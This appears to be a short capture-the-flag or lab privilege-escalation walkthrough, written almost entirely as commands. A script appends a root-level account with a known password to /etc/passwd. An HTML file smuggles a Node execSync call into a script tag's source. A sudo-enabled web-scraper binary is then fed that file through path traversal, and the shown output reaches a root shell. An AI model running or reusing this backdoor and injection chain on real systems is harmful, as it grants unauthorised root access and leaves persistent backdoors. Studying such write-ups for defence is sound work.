File: /tmp/payload.sh
#!/bin/sh
echo 'strikoder:$1$xyz$AtdNQIrMzNYyjUT1XH5IU1:0:0:root:/root:/bin/bash' >> /etc/passwd #su strikoder:abcd1234####Make executable:
chmod +x /tmp/payload.shFile: /tmp/payload.html
<script src="https://localhost:80/'+require('child_process').execSync('/tmp/payload.sh')+'"></script>Execute with sudo-enabled web-scraper binary (for example):
sudo /usr/bin/web-scraper /root/web_src_downloaded/../../../tmp/payload.htmlsu strikoder
# Password: abcd1234####
id
# uid=0(root) gid=0(root) groups=0(root)